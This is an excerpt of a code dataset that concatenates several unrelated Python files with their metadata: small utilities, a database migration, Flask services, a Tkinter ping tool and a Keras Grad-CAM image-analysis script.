\"/Users/apple/XHSworkspace/data/structure/food/dataset/frq_ana\"\n data = ana.read_file(\n osp.join(dir_path, \"000000_0_res2\"))\n # data = pd.read_csv(osp.join(dir_path, \"美食query.csv_10000_res\"),\n # error_bad_lines=False,\n # header=None)\n data2 = []\n for i in data:\n data2.extend(i.split(\"\\t\"))\n ana.count_frq(data=data2)\n print(\"hi\")\n","sub_path":"entity_extractor/data_scripts/analysis_frq.py","file_name":"analysis_frq.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525680671","text":"#\n#\n# @param x int整型\n# @return bool布尔型\n#\nclass Solution:\n def isPalindrome(self , x):\n if x < 0: return False\n temp = x\n y = 0\n while temp != 0:\n y = y*10 + temp%10\n temp = temp//10\n if y == x: return True\n else: return False\n\nif __name__ == '__main__':\n x = 193794287\n s = Solution()\n ans = s.isPalindrome(x)\n print(ans)\n","sub_path":"palindrome_number.py","file_name":"palindrome_number.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202948430","text":"#\n# Copyright (C) 2018 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Add analytics\n\nRevision ID: 46fa9eb61235\nRevises: bcd903a35145\nCreate Date: 2018-08-10 13:51:24.538380\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '46fa9eb61235'\ndown_revision = 'bcd903a35145'\nbranch_labels = None\ndepends_on = None\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql as pg\nimport sqlalchemy_utils as sa_utils\n\nfrom dci.common import utils\n\n\ndef upgrade():\n\n op.create_table(\n 'analytics',\n sa.Column('id', pg.UUID(as_uuid=True), primary_key=True,\n default=utils.gen_uuid),\n sa.Column('created_at', sa.DateTime(),\n default=datetime.datetime.utcnow, nullable=False),\n sa.Column('updated_at', sa.DateTime(),\n onupdate=datetime.datetime.utcnow,\n default=datetime.datetime.utcnow, nullable=False),\n sa.Column('etag', sa.String(40), nullable=False,\n default=utils.gen_etag,\n onupdate=utils.gen_etag),\n sa.Column('team_id', pg.UUID(as_uuid=True),\n sa.ForeignKey('teams.id', ondelete='CASCADE'),\n nullable=False),\n sa.Index('analytics_team_id_idx', 'team_id'),\n sa.Column('job_id', pg.UUID(as_uuid=True),\n sa.ForeignKey('jobs.id', ondelete='CASCADE'),\n nullable=False),\n sa.Index('analytics_job_id_idx', 'job_id'),\n sa.Column('type', sa.String(255), nullable=False),\n sa.Column('name', sa.String(255), unique=False, nullable=False),\n sa.Index('analytics_name_team_id_idx', 'name', 'team_id',\n unique=True),\n sa.Column('url', sa.String(255)),\n sa.Column('data', sa_utils.JSONType, default={}, nullable=False)\n )\n\n\ndef downgrade():\n pass\n","sub_path":"dci/alembic/versions/46fa9eb61235_add_analytics.py","file_name":"46fa9eb61235_add_analytics.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"528362393","text":"import os\nimport errno\nimport csv\nimport time\n\ndef init_csv(filename):\n \n csvfile = open(filename, 'a')\n csvwriter = csv.writer(csvfile, delimiter = ';', quotechar = '\"', quoting=csv.QUOTE_MINIMAL)\n csvwriter.writerow([''])\n csvwriter.writerow([''])\n csvwriter.writerow(['New Training started at %g '%time.time()])\n csvwriter.writerow([''])\n return csvfile, csvwriter\n \ndef init_train_csv(filename):\n csvfile, csvwriter = init_csv(filename)\n csvwriter.writerow(['Loss Function'] + ['Iterations'] + ['Epochs'] + ['Training Accuracy'] + ['Computation Time'])\n csvfile.close()\n# return csvfile, csvwriter\n \ndef init_test_csv(filename):\n csvfile, csvwriter = init_csv(filename)\n csvwriter.writerow(['Loss Function'] + ['Iterations'] + ['Epochs'] + ['Testing Accuracy'] + ['Computation Time'])\n csvfile.close()\n# return csvfile, csvwriter\n \n# Open a csv file, write a row at the end of it, and close it\ndef csv_writerow(csv_file, row):\n \n with open(csv_file, 'a') as f:\n writer = csv.writer(f, delimiter = ';', quotechar = '\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(row)\n \n# This function creates a path if it doesn't already exist\ndef make_sure_path_exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise","sub_path":"AlexNet_cifar10/csv_export.py","file_name":"csv_export.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401050911","text":"from tkinter import *\nfrom tkinter.filedialog 
import askopenfilename\nfrom tkinter.messagebox import *\nfrom ping.ping import *\n\nimport time\n\n#Devuelve un string con el tiempo actual seguido de :\ndef get_strtime():\n return time.strftime(\"%H:%M:%S\")+\":\"\n\n#Clase que establece la interfaz de usuario de la unitilidad conexion.\nclass ventana_ping:\n def __init__(self,v0):\n self.root = v0;\n self.ventana = Toplevel(self.root)\n self.ventana.resizable(0,0)\n self.ventana.wm_title(\"Conexiones pasiva v4\")\n self.textohoras = StringVar()\n self.textohoras.set(get_strtime()[0:-1])\n self.textohoraslabel = Label(self.ventana,textvar=self.textohoras,anchor=W,width=40,pady=3).grid(row=1,column=1)\n self.textoatencion = StringVar()\n self.textoatencion.set(\"Aceptar condiciones en la primera ejecucion.\")\n self.textoatencionlabel = Label(self.ventana,textvar=self.textoatencion,anchor=W,width=40,pady=3).grid(row=1,column=2)\n self.textoip = StringVar()\n self.textoip.set(\"Maquina:\")\n self.labeltextoip=Label(self.ventana,textvar = self.textoip,anchor=W,width=35,pady=3).grid(row=2,column=1)\n self.inputipstr = StringVar()\n self.inputip = Entry(self.ventana,textvar=self.inputipstr,width=40).grid(row=3,column=1)\n\n self.textotoutdump = StringVar()\n self.textotoutdump.set(\"Numero de paquetes:\")\n self.labeltextotoutdump=Label(self.ventana,textvar = self.textotoutdump,anchor=W,width=35,pady=3).grid(row=4,column=1)\n self.inputtodumpstr = StringVar()\n self.inputtodumpstr.set(\"5\")\n self.inputtodump = Entry(self.ventana,textvar=self.inputtodumpstr,width=40).grid(row=5,column=1)\n\n self.textopaquetes = StringVar()\n self.textopaquetes.set(\"Paquetes\")\n self.labeltextopaquetes=Label(self.ventana,textvar = self.textopaquetes,width=35,pady=3).grid(row=6,column=1)\n self.textoenviados = StringVar()\n self.textoenviados.set(\"Enviados:\")\n self.labeltextoenviados=Label(self.ventana,textvar = self.textoenviados,anchor=W,width=35,pady=3).grid(row=7,column=1)\n self.textorecibidos = StringVar()\n self.textorecibidos.set(\"Recibidos:\")\n self.labeltextorecibidos=Label(self.ventana,textvar = self.textorecibidos,anchor=W,width=35,pady=3).grid(row=8,column=1)\n self.textoerror = StringVar()\n self.textoerror.set(\"Error:\")\n self.labeltextoerror=Label(self.ventana,textvar = self.textoerror,anchor=W,width=35,pady=3).grid(row=9,column=1)\n self.textoperdidos = StringVar()\n self.textoperdidos.set(\"Perdidos:\")\n self.labeltextoperdidos=Label(self.ventana,textvar = self.textoperdidos,anchor=W,width=35,pady=3).grid(row=10,column=1)\n\n self.textortt = StringVar()\n self.textortt.set(\"RTTs (ms)\")\n self.labeltextortt=Label(self.ventana,textvar = self.textortt,width=35,pady=3).grid(row=6,column=2)\n self.textominimo = StringVar()\n self.textominimo.set(\"Minimo:\")\n self.labeltextominimo=Label(self.ventana,textvar = self.textominimo,anchor=W,width=35,pady=3).grid(row=7,column=2)\n self.textomedia = StringVar()\n self.textomedia.set(\"Media:\")\n self.labeltextomedia=Label(self.ventana,textvar = self.textomedia,anchor=W,width=35,pady=3).grid(row=8,column=2)\n self.textomaximo = StringVar()\n self.textomaximo.set(\"Maximo:\")\n self.labeltextomaximo=Label(self.ventana,textvar = self.textomaximo,anchor=W,width=35,pady=3).grid(row=9,column=2)\n self.textoderiv = StringVar()\n self.textoderiv.set(\"Derivacion:\")\n self.labeltextoderiv=Label(self.ventana,textvar = self.textoderiv,anchor=W,width=35,pady=3).grid(row=10,column=2)\n\n self.botonejecutar = Button(self.ventana,text=\"Iniciar\",command=lambda: self.conectar(), width=10).grid(row = 11, 
column=2)\n self.log = StringVar()\n self.labellog = Label(self.ventana,textvar=self.log, anchor=W, width=40).grid(row=11,column=1)\n\n #Funcion que se ejecuta al pulsar el boton de conectar.\n def conectar(self):\n maquina = self.inputipstr.get()\n if(maquina.isspace()) or (maquina == \"\"):\n self.log.set(get_strtime()+\"Error, introduce una maquina\")\n self.root.update_idletasks()\n return\n if(self.inputtodumpstr.get().isspace()) or (self.inputtodumpstr.get() == \"\"):\n paquetes = \"4\"\n else:\n paquetes = self.inputtodumpstr.get()\n print(\"Maquina: \"+maquina)\n print(\"Paquetes: \"+paquetes)\n statistics = get_ping_statistics(maquina,paquetes)\n print(statistics)\n try:\n self.textoenviados.set(\"Enviados: \"+statistics[\"enviados\"])\n self.textorecibidos.set(\"Recibidos: \"+statistics[\"recibidos\"])\n self.textoerror.set(\"Error: \"+statistics[\"error\"])\n self.textoperdidos.set(\"Perdidos: \"+statistics[\"perdidos\"])\n self.textominimo.set(\"Minimo: \"+statistics[\"minimo\"])\n self.textomedia.set(\"Media: \"+statistics[\"media\"])\n self.textomaximo.set(\"Maximo: \"+statistics[\"maximo\"])\n self.textoderiv.set(\"Derivacion: \"+statistics[\"desviacion\"])\n self.log.set(get_strtime()+\" Ejecutado con exito.\")\n self.root.update_idletasks()\n except KeyError:\n self.log.set(get_strtime()+\" Error al ejecutar el ping.\")\n self.root.update_idletasks()\n","sub_path":"herramientas/ping_ui/ping_ui.py","file_name":"ping_ui.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559077877","text":"\nimport json\nimport pickle\nimport ast\n\nfrom app.extensions import db\nfrom random import choice\nfrom string import ascii_letters\nfrom flask_jwt import current_user\nfrom multiprocessing import Pool\nfrom sklearn.svm import SVC\n\n\nclass Person(db.Model):\n __tablename__ = 'people'\n id = db.Column(db.Integer, primary_key=True)\n uid = db.Column(db.String(80), unique=True)\n email = db.Column(db.String(120), unique=True)\n first_name = db.Column(db.String(80))\n last_name = db.Column(db.String(80))\n creator_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n creator = db.relationship('User')\n is_active = db.Column(db.Integer(1), default=True)\n is_sealed = db.Column(db.Integer(1), default=False)\n\n reference_singatures = db.relationship('ReferenceSignature')\n dtw_char = db.relationship('DtwCharacteristics')\n svm_instances = db.relationship('SvmInstance')\n\n def __init__(self, first_name, last_name, email, creator=current_user):\n self.first_name = first_name\n self.last_name = last_name\n self.email = email\n self.creator = creator\n\n def __repr__(self):\n return '' % self.first_name\n\n @staticmethod\n def create(first_name, last_name, email, creator=current_user):\n if not Person.query.filter_by(**{'email': email}).first():\n person = Person(first_name=first_name, last_name=last_name, email=email, creator=creator)\n db.session.add(person)\n db.session.commit()\n person.uid = \"\".join([choice(ascii_letters) for _ in range(20-len(str(person.id)))])+'_'+str(person.id)\n db.session.add(person)\n db.session.commit()\n else:\n raise Exception(\"Email Already Taken\")\n return person\n\n def update(self, first_name, last_name, email, creator=current_user):\n\n self.first_name = first_name\n self.last_name = last_name\n self.email = email\n self.creator = creator\n db.session.add(self)\n db.session.commit()\n return self.uid\n\n def delete(self):\n self.is_active = False\n 
db.session.add(self)\n db.session.commit()\n\n def to_json2(self):\n \"\"\"Returns a json representantion of the user.\n :returns: a json object.\n \"\"\"\n\n return {\n 'id': str(self.id),\n 'uid': str(self.uid),\n 'first_name': self.first_name,\n 'last_name': self.last_name\n }\n\n\nclass ReferenceSignature(db.Model):\n __tablename__ = 'reference_signature'\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n signature = db.Column(db.Text)\n\n def __init__(self, owner, signature_array):\n self.owner = owner\n self.signature = json.dumps(signature_array)\n\n @staticmethod\n def create(owner:Person, signature_array):\n if not owner.is_sealed and owner.is_active:\n reference_signature = ReferenceSignature(owner=owner, signature_array=signature_array)\n db.session.add(reference_signature)\n db.session.commit()\n DtwCharacteristics.create(owner)\n return reference_signature\n raise SealException(\"Person is sealed\")\n\n @property\n def signature_dtw_feature(self):\n from app.DynamicTimeWarping.DTW import fetch_features\n signature = ast.literal_eval(self.signature)\n features = fetch_features(signature)\n return features\n\n def to_json2(self):\n \"\"\"Returns a json representantion of the user.\n :returns: a json object.\n \"\"\"\n\n return {\n 'id': str(self.id),\n 'signature': self.signature\n }\n\n\nclass DtwCharacteristics(db.Model):\n __tablename__ = 'dtw_chars'\n id = db.Column(db.Integer, primary_key=True)\n\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n\n min_mean = db.Column(db.Float)\n mean_ref = db.Column(db.Float)\n max_mean = db.Column(db.Float)\n\n best_ref_id = db.Column(db.Integer, db.ForeignKey('reference_signature.id'))\n best_ref = db.relationship('ReferenceSignature')\n\n average_vector = db.Column(db.PickleType)\n signature_length_mean = db.Column(db.Float)\n signature_length_deviation = db.Column(db.Float)\n\n def __init__(self, owner):\n \"\"\"\n\n :param Person owner :\n \"\"\"\n self.owner = owner\n self.populate_dtw_chars()\n\n def populate_dtw_chars(self):\n if len(self.owner.reference_singatures) > 4:\n from app.DynamicTimeWarping.DTW import compute_normalizers\n [min_mean, mean_ref, best_ref,\n max_mean, average_vector, signature_length_mean,\n signature_length_deviation] = compute_normalizers(self.owner.reference_singatures)\n self.min_mean = min_mean\n self.mean_ref = mean_ref\n self.best_ref_id = best_ref\n self.max_mean = max_mean\n self.average_vector = average_vector\n self.signature_length_mean = signature_length_mean\n self.signature_length_deviation = signature_length_deviation\n\n @staticmethod\n def create(owner: Person):\n dtw_character = DtwCharacteristics.query.filter_by(owner=owner).first()\n if dtw_character:\n dtw_character.populate_dtw_chars()\n else:\n dtw_character = DtwCharacteristics(owner)\n\n if len(owner.reference_singatures) > 4:\n owner.is_sealed = True\n db.session.merge(dtw_character)\n db.session.merge(owner)\n db.session.commit()\n\n \"\"\"\n multi threaded training of DTW SVM\n \"\"\"\n print(owner)\n owner.reference_singatures\n owner.dtw_char\n\n pool = Pool(processes=1)\n pool.apply_async(SvmInstance.create, (owner, 'DTW'))\n pool.close()\n # SvmInstance.create(owner, 'DTW')\n return dtw_character\n\n\n\nclass SvmInstance(db.Model):\n __tablename__ = 'svm_instances'\n id = db.Column(db.Integer, primary_key=True)\n instance_pickle = db.Column(db.PickleType)\n type = 
db.Column(db.Enum('DTW', 'iVector', 'RNN'))\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n\n def __init__(self, owner, type):\n self.owner = owner\n self.type = type\n self.populate(type)\n\n def populate(self, type):\n trainer = {\n 'DTW': self.train_dtw_svm,\n 'iVector': self.train_ivector_svm,\n 'RNN': self.train_rnn_svm\n }.get(type, None)\n self.instance_pickle = trainer()\n\n @staticmethod\n def create(owner: Person, type):\n svminstance = SvmInstance.query.filter_by(owner_id=owner.id, type=type).first()\n if not svminstance:\n svminstance = SvmInstance(owner=owner, type=type)\n else:\n svminstance.populate(owner, type)\n db.session.merge(svminstance)\n db.session.commit()\n print(\"DTW SVM trained for owner {name}\".format(name=owner.first_name+' '+owner.last_name))\n\n def train_dtw_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n from app.DynamicTimeWarping.DTW import prepare_svm_vectors_and_labels\n vectors, labels = prepare_svm_vectors_and_labels(self.owner)\n clf.fit(vectors, labels)\n return clf\n\n def train_ivector_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n # @TODO train iVector for owner and save svm\n return clf\n\n def train_rnn_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n # @TODO train RNN for owner and save svm\n return clf\n\n @property\n def SVM(self):\n return pickle.loads(self.instance_pickle)\n\nclass SealException(Exception):\n pass","sub_path":"app/person/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"510461009","text":"from flask import Flask, request, jsonify\r\nimport recommender\r\nimport artifacts.firebase_config\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef home():\r\n return 'fs'\r\n\r\n\r\n@app.route('/v1/getSimilarDesigns', methods=['GET', 'POST'])\r\ndef get_similar_designs():\r\n try:\r\n content = request.json\r\n gender = content[\"gender\"]\r\n event = content[\"event\"]\r\n dress_type = content[\"dress_type\"]\r\n article_type = content[\"article_type\"]\r\n img_url = content[\"img_url\"]\r\n res = recommender.get_similar_designs(gender, event, dress_type, article_type, img_url)\r\n if res != -1:\r\n response = jsonify(\r\n payload=str(res),\r\n status=200,\r\n mimetype='application/json'\r\n )\r\n else:\r\n response = jsonify(\r\n payload='No matches',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n return response\r\n except:\r\n return jsonify(\r\n payload='Server Error',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n\r\n\r\n@app.route('/v1/getSimilarDesigners', methods=['GET', 'POST'])\r\ndef get_similar_designers():\r\n try:\r\n content = request.json\r\n gender = content[\"gender\"]\r\n event = content[\"event\"]\r\n dress_type = content[\"dress_type\"]\r\n lat = content[\"lat\"]\r\n lng = content[\"lng\"]\r\n res = recommender.get_similar_designers(gender, event, dress_type, lat, lng)\r\n if res != -1:\r\n response = jsonify(\r\n payload=str(res),\r\n status=200,\r\n mimetype='application/json'\r\n )\r\n else:\r\n response = jsonify(\r\n payload='No matches',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n return response\r\n except:\r\n return jsonify(\r\n payload='Server Error',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
app.run(debug=True)\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631704137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 15 13:05:02 2019\r\n\r\n@author: paulo\r\n\"\"\"\r\n\r\n#DATA AUGMENTATION\r\nimport os\r\nimport cv2\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\nfrom PIL import Image\r\nfrom skimage.color import rgb2gray\r\n\r\nfrom keras.models import load_model\r\nimport tensorflow as tf\r\ntf.compat.v1.disable_eager_execution()\r\nfrom keras.layers import InputLayer\r\nfrom keras.models import Sequential\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n#import cv2\r\nfrom keras import layers\r\nfrom keras import models\r\n\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.models import Sequential\r\n\r\nfrom keras.applications.vgg16 import VGG16\r\n\r\nfrom vis.losses import ActivationMaximization\r\nfrom vis.regularizers import TotalVariation, LPNorm\r\nfrom vis.input_modifiers import Jitter\r\nfrom vis.optimizer import Optimizer\r\nfrom vis.callbacks import GifGenerator\r\n\r\nimport cv2\r\n\r\nfrom vis.losses import ActivationMaximization\r\nfrom vis.regularizers import TotalVariation, LPNorm\r\nfrom vis.input_modifiers import Jitter\r\nfrom vis.optimizer import Optimizer\r\nfrom vis.callbacks import GifGenerator\r\n\r\nfrom vis.utils import utils\r\n#from keras import activations\r\nfrom keras.preprocessing import image\r\nimport keras\r\nfrom keras.layers import Dropout\r\nfrom keras import backend as K\r\nfrom keras import regularizers\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nimport os\r\n\r\n#identifies what is the average size of the pillars images\r\ndef image_size(SERS,NONSERS):\r\n \r\n #get the files inside the folders\r\n SERS_train = os.listdir(SERS)\r\n NONSERS_train = os.listdir(NONSERS)\r\n \r\n all_dir = [SERS, NONSERS]\r\n all_data = [SERS_train, NONSERS_train]\r\n \r\n shape = []\r\n \r\n for dire,file in zip(all_dir, all_data):\r\n \r\n folder = dire.split('/')[-2]+'/'\r\n for f in file:\r\n ima = cv2.imread(dire+f)\r\n shape.append([ima.shape[0],ima.shape[1]])\r\n \r\n return shape\r\n\r\nfrom PIL import Image\r\n#breaks the images in parts shaped like shape vector [x,y]\r\ndef break_image(input_frames,shape):\r\n \r\n if len(shape) == 2:\r\n \r\n height = int(shape[0])\r\n width = int(shape[1])\r\n size = cv2.imread(input_frames).shape[0:2]\r\n \r\n division = [size[0]//height,size[1]//width]\r\n \r\n \r\n else:\r\n \r\n max_shape = np.max(shape,axis=0)\r\n min_shape = np.min(shape,axis=0)\r\n \r\n size = cv2.imread(input_frames).shape[0:2]\r\n \r\n division = np.mean(size)//np.mean([max_shape,min_shape])\r\n \r\n shape_vec = np.mean([max_shape,min_shape],axis=0)\r\n \r\n height = int(shape_vec[0])\r\n width = int(shape_vec[1])\r\n \r\n im = Image.open(input_frames)\r\n imgwidth, imgheight = im.size\r\n test_image = []\r\n \r\n for i in range(0,imgheight,height):\r\n for j in range(0,imgwidth,width):\r\n box = (j, i, j+width, i+height)\r\n a = im.crop(box)\r\n test_image.append(a)\r\n \r\n return test_image,division\r\n\r\n\r\n\r\n\r\n# image = cap[0]\r\n# ADD ALEX SECTION 
HERE\r\n\r\n\r\n\r\n\r\n#load the pillar identification model\r\n\r\n\r\n \r\ndef generate_regionof_interest(image_identifier,test_image,label):\r\n \r\n \r\n model = Sequential()\r\n for layer in image_identifier.layers:\r\n model.add(layer)\r\n \r\n for layer in model.layers:\r\n layer.trainable = False\r\n \r\n \r\n labels = ['pillar', 'nopillar']\r\n from keras.applications.vgg16 import preprocess_input\r\n from keras.applications.vgg16 import (VGG16, preprocess_input, decode_predictions)\r\n \r\n heatmaps = []\r\n from keras.preprocessing import image\r\n \r\n location = []\r\n #get the activations from the test image broken in pieces\r\n \r\n for cnt,f in enumerate(test_image):\r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n \r\n preds = model.predict(x)\r\n if preds[0][1]>0.5:\r\n location.append(1)\r\n plt.figure()\r\n plt.imshow(img)\r\n plt.savefig(r'/home/newuser/Desktop/alex/cnn pillars/gen/'+label+str(cnt)+'.png', dpi = 300,bbox_inches=\"tight\")\r\n plt.close()\r\n else:\r\n location.append(0)\r\n \r\n num = np.argmax(preds)\r\n \r\n img_output = model.layers[0].layers[-1].output[:,num]\r\n last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n pooled_grads = K.mean(grads, axis= (0,1,2))\r\n # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n iterate = K.function([ model.layers[0].layers[0].input],\r\n [pooled_grads, last_conv_layer.output[0]])\r\n \r\n pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n for j in range(512):\r\n conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n heatmap = np.maximum(heatmap,0)\r\n heatmap /= np.max(heatmap)\r\n \r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n \r\n heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n heatmap = np.uint8(255 * heatmap)\r\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n \r\n \r\n if max(max(img.getextrema()))==0:\r\n img *= np.uint8(255.0/(0.000001+max(max(img.getextrema()))))\r\n else:\r\n img *= np.uint8(255.0/max(max(img.getextrema())))\r\n \r\n \r\n blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n heatmaps.append(blend)\r\n \r\n return heatmaps,location\r\n \r\n\r\n\r\n\r\ndef plot_results(test,heatmaps,location,division):\r\n \r\n #plot the test image with heatmaps\r\n \r\n w,h,c=heatmaps[0].shape\r\n iteray = int(division[0])+1\r\n iterax = int(division[1])+1\r\n final_heath = np.zeros(shape=(w*iteray,h*iterax,c))\r\n \r\n for i in range(iteray):\r\n for j in range(iterax): \r\n final_heath[i*w:(i+1)*w,j*h:(j+1)*h,:] = heatmaps[i*iterax+j]*location[i*iterax+j]\r\n \r\n # final_heat = final_heat//final_heat.max()\r\n plt.figure()\r\n plt.imshow(final_heath/255)\r\n \r\n \r\n import pandas as pd\r\n \r\n #perfect the mask into a square, filling up all previous area\r\n \r\n mask = pd.DataFrame(np.array(location).reshape(iteray,iterax))\r\n locx = []\r\n locy = []\r\n \r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if mask.iloc[i,j] == 1:\r\n locx.append(i)\r\n locy.append(j)\r\n \r\n mask_fill = pd.DataFrame(np.zeros((iteray,iterax)))\r\n \r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if (i>np.min(locx)-1 and inp.min(locy)-1 and j0.5:\r\n location.append(1)\r\n plt.figure()\r\n 
plt.imshow(img)\r\n plt.savefig(r'/home/newuser/Desktop/alex/cnn pillars/gen/'+label+str(cnt)+'.png', dpi = 300,bbox_inches=\"tight\")\r\n plt.close()\r\n else:\r\n location.append(0)\r\n \r\n \r\n \r\n img_output = model.layers[0].layers[-1].output[:,num]\r\n last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n pooled_grads = K.mean(grads, axis= (0,1,2))\r\n # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n iterate = K.function([ model.layers[0].layers[0].input],\r\n [pooled_grads, last_conv_layer.output[0]])\r\n \r\n pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n for j in range(512):\r\n conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n heatmap = np.maximum(heatmap,0)\r\n heatmap /= np.max(heatmap)\r\n \r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n \r\n heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n heatmap = np.uint8(255 * heatmap)\r\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n \r\n \r\n if max(max(img.getextrema()))==0:\r\n img *= np.uint8(255.0/(0.000001+max(max(img.getextrema()))))\r\n else:\r\n img *= np.uint8(255.0/max(max(img.getextrema())))\r\n \r\n \r\n blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n heatmaps.append(blend)\r\n \r\n return heatmaps,location\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#actual pillar size\r\n\r\n# size2 = image_size(r'/home/newuser/Desktop/emily try/Data3_2122points/original folder/SERS/',\r\n # r'/home/newuser/Desktop/emily try/Data3_2122points/original folder/nonSERS/')\r\n\r\nsize2 = [50,50]\r\n\r\nnewcropped = cropped[:,1000:,:]\r\n\r\ntest_image2,division2 = break_image2(newcropped,size2)\r\n\r\nsers_identifier = load_model(r'/home/newuser/Desktop/emily try/Data4last/SERS_NOSERS_pillars_v05.h5')\r\n\r\n\r\n\r\nheatmaps2,location2 = generate_regionof_interest2(sers_identifier,test_image2,'sers_notsers')\r\n#plots heatmap activation over the initial test sample, plots over test image the complete reconstructed activation region.\r\nfinal_heat2 = plot_results2(newcropped,heatmaps2,division2,location2)\r\n\r\n\r\n \r\n # return True\r\n\r\n# pillar_locator(image_identifier, test_image)\r\n\r\n\r\n\r\n#load first model to identify where the pillars are situated in an image\r\n# test = r'/home/newuser/Desktop/alex/cnn pillars/test/test.jpg'\r\n# image_break,division = break_image(test,[150,150])\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n# classifier = load_model(r'/home/newuser/Desktop/alex/SERS_NOSERS_pillars_v05.h5')\r\n\r\n# model = Sequential()\r\n# # model.add(InputLayer(input_shape=(150,150)))\r\n# for layer in classifier.layers:\r\n# model.add(layer)\r\n\r\n# for layer in model.layers:\r\n# layer.trainable = False\r\n\r\n# labels = ['pillar', 'notpillar']\r\n# from keras.applications.vgg16 import preprocess_input\r\n# from keras.applications.vgg16 import (VGG16, preprocess_input, decode_predictions)\r\n\r\n# heatmaps = []\r\n# from keras.preprocessing import image\r\n\r\n# for f in test_image:\r\n\r\n# img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n# x = image.img_to_array(img)\r\n# x = np.expand_dims(x, axis=0)\r\n# # x = preprocess_input(x)\r\n \r\n# preds = model.predict(x)\r\n \r\n# if preds[0][1]>0.5:\r\n# plt.figure()\r\n# plt.imshow(img)\r\n \r\n\r\n \r\n# color = []\r\n# num = np.argmax(preds)\r\n \r\n \r\n# if 
